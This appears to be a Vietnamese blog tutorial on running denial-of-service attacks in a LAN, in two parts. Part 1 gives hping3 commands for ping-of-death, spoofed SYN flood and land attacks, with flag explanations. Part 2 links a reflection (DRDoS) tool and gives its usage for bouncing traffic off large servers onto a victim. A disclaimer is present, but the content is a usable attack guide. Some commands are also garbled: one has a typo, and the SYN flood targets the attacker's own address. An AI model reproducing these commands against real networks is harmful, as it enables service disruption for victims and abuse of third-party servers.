:/* Đã update part 2 */
Tấn công mạng LAN DoS (Denial of Service)
Chuẩn bị :
_ Backtrack (lí do mình xài backtrack là bởi vì nó đã được cài sẵn các ngôn ngữ lập trình và tool thông dụng) / Linux (phải tự tìm download tool)
_ Hping3 (có sẵn trong BT)
_ smurf (smurf attack) . Source code: http://www.rs-labs.com/papers/tactic...ils/smurf.html
Target :10.0.0.12 | Windows 8 Enterprise
Attacker : 10.0.0.11 | Backtrack R3 (chạy máy ảo Virtual Box trên Windows 8)
Router : 10.0.0.1
Nguyên lý :
[+] Giải thích sơ bộ:
[-] DoS attack trong mạng LAN mình sẽ hướng dẫn gồm:
[-] Ping of death: gửi những gói tin có kích thước vô cùng lớn với tốc độ vô cùng nhanh (size=65000 byte) gây nghẽn mạng, không cho đối phương giao tiếp ra ngoài
[-] SYN Flood: khi ta muốn kết nối đến 1 máy nào đó, ta gửi một gói tin có bật cờ SYN để yêu cầu máy đích mở kết nối, nếu ta giả địa chỉ IP gốc thành địa chỉ giả, thì máy đích sẽ dùng 1 phần tài nguyên để chờ phản hồi của máy yêu cầu, nhưng kết quả là không máy nào tl, gửi những gói tin nv liên tục sẽ khiến máy đích bị treo.
Hình minh họa:
#Client ===(SYN)===> #Server /*yêu cầu dc kết nối, server dành 1 phần RAM để chờ kết nối*/
#Server <===(SYN)=== #Client
|
(SYN/ACK) /*Client hỏi 1 đằng, server trả lời 1 nẻo => tốn tài nguyên (phục vụ client giả)*/
|
\/
#Client giả
[-] Land Attack: tương tự như SYN Flood nhưng đổi IP thành IP của máy bị tấn công => máy victim tự hỏi tự trả lời vô hạn.
[-] Smurf Attack: gửi gói ICMP đi khắp các máy trong mạng => mượn tay máy khác giết máy victim
Thực hiện:
Lưu ý: Mình không chịu trách nhiệm cũng như khuyến khích những hành vi phạm pháp do TuT này, cái này chỉ dành cho mục đích tham khảo. Khi làm theo TuT này bạn sẽ chịu trách nhiệm về hành động của mình. Thanks
Part 1
Cature packet bằng Wireshark trước khi tấn công :
[+] Ping of Death: phần này mình sẽ gửi gói tin ICMP cho hiệu quả
Code:
hping3 10.0.0.12 -1 -d 65000 -i u1 -V -n
[+] hping3 : tên tool
[+] 10.0.0.12 : target
[+] -1 : chọn ICMP mode
[+] -d : chọn kích thước tập tin (65000)
[+] -i : tóc độ (u1 =rất nhanh)
[+] -V, -n: ouput
Hình ảnh từ wireshark :
Hình ảnh từ Windows:
Bandwidth : 47 Mbps !!! (ngay cả lúc torrent còn chưa dc thế lày ) o.O
[+] SYN Flood :
Code:
hping3 10.0.0.11 -a 1.2.3.4 -1 -S -i u1 -V -n
[+] -a : địa chỉ để giả mạo (1.2.3.4)
[+] -S : bật cờ SYN
Hình ảnh từ Wireshark :
Hình ảnh từ Windows :
[+] Land Attack:
Code:
hpỉng 10.0.0.12 -a 10.0.0.12 -1 -S -i u1 -V -n
Hình ảnh từ Wireshark :
Hình ảnh từ Windows:
END OF PART 1
/* Mỏi tay tóa, hnay mình hướng dẫn nhiu đây thôi, lần tới mình sẽ hướng dẫn Teardrop attack và smurf attack */
/* ae nhớ đón xem */
/* Update Part 2 */
Distributed Reflected Denial of Service Attack (DRDoS)
==> Chú ý: kiểu tấn công này rất nguy hiểm, đặt biệt là khi sử dụng ko đúng mức, mình đã tự test với chính mình và kết quả là bị mất kết nối internet suốt nguyên đêm trong khi máy khác vẫn vào bình thường. Chỉ sử dụng khi biết mình đang làm gì !
Tải source code tại đây (file tar):http://packetstormsecurity.org/files...rgasm.tgz.html
Nguyên lý:
/* Trích */
DRDoS ( The Distributed Reflection Denial of Service Attack ) :
Đây có lẽ là kiểu tấn công lợi hại nhất và làm boot máy tính của đối phương nhanh gọn nhất . Cách làm thì cũng tương tự như DDos nhưng thay vì tấn công bằng nhiều máy tính thì người tấn công chỉ cần dùng một máy tấn công thông qua các server lớn trên thế giới . Vẫn với phương pháp giả mạo địa chỉ IP của victim , kẻ tấn công sẽ gởi các gói tin đến các server mạnh nhất, nhanh nhất và có đường truyền rộng nhất như Yahoo,v.v… , các server này sẽ phản hồi các gói tin đó đến địa chỉ của victim. Việc cùng một lúc nhận được nhiều gói tin thông qua các server lớn này sẽ nhanh chóng làm nghẽn đường truyền của máy tính nạn nhân và làm crash , reboot máy tính đó . Cách tấn công này lợi hại ở chỗ chỉ cần một máy có kết nối Internet đơn giản với đường truyền bình thường cũng có thể đánh bật được hệ thống có đường truyền tốt nhất thế giới nếu như ta không kịp ngăn chặn.
*/
Thực hiện :
_ Sau khi tải file ta giải nén ra thư mục , di chuyển đến đấy
_ tạo file text có IP của server lớn
_Chạy chương trình:
Code:
./pHorgasm <target> <file host> <số lượng packet> < delay time> <size>
/* End of part 2*/
0 nhận xét:
Đăng nhận xét